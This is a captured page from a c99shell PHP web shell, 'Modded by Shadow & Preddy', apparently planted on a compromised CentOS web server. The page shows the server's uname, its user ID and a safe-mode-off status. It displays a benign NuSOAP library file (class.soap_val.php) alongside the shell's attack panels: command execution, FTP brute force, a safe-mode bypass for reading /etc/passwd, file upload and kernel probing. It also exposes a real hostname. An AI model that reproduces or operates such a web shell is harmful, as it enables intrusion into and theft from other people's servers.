!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/eoffice/lib/   drwxr-xr-x
Free 52.29 GB of 127.8 GB (40.92%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class.soap_val.php (2.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php




/**
* For creating serializable abstractions of native PHP types.  This class
* allows element name/namespace, XSD type, and XML attributes to be
* associated with a value.  This is extremely useful when WSDL is not
* used, but is also useful when WSDL is used with polymorphic types, including
* xsd:anyType and user-defined types.
*
* @author   Dietrich Ayala <dietrich@ganx4.com>
* @version  $Id: class.soap_val.php,v 1.11 2007/04/06 13:56:32 snichol Exp $
* @access   public
*/
class soapval extends nusoap_base {
    
/**
     * The XML element name
     *
     * @var string
     * @access private
     */
    
var $name;
    
/**
     * The XML type name (string or false)
     *
     * @var mixed
     * @access private
     */
    
var $type;
    
/**
     * The PHP value
     *
     * @var mixed
     * @access private
     */
    
var $value;
    
/**
     * The XML element namespace (string or false)
     *
     * @var mixed
     * @access private
     */
    
var $element_ns;
    
/**
     * The XML type namespace (string or false)
     *
     * @var mixed
     * @access private
     */
    
var $type_ns;
    
/**
     * The XML element attributes (array or false)
     *
     * @var mixed
     * @access private
     */
    
var $attributes;

    
/**
    * constructor
    *
    * @param    string $name optional name
    * @param    mixed $type optional type name
    * @param    mixed $value optional value
    * @param    mixed $element_ns optional namespace of value
    * @param    mixed $type_ns optional namespace of type
    * @param    mixed $attributes associative array of attributes to add to element serialization
    * @access   public
    */
      
function soapval($name='soapval',$type=false,$value=-1,$element_ns=false,$type_ns=false,$attributes=false) {
        
parent::nusoap_base();
        
$this->name $name;
        
$this->type $type;
        
$this->value $value;
        
$this->element_ns $element_ns;
        
$this->type_ns $type_ns;
        
$this->attributes $attributes;
    }

    
/**
    * return serialized value
    *
    * @param    string $use The WSDL use value (encoded|literal)
    * @return    string XML data
    * @access   public
    */
    
function serialize($use='encoded') {
        return 
$this->serialize_val($this->value$this->name$this->type$this->element_ns$this->type_ns$this->attributes$usetrue);
    }

    
/**
    * decodes a soapval object into a PHP native type
    *
    * @return    mixed
    * @access   public
    */
    
function decode(){
        return 
$this->value;
    }
}




?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.009 ]--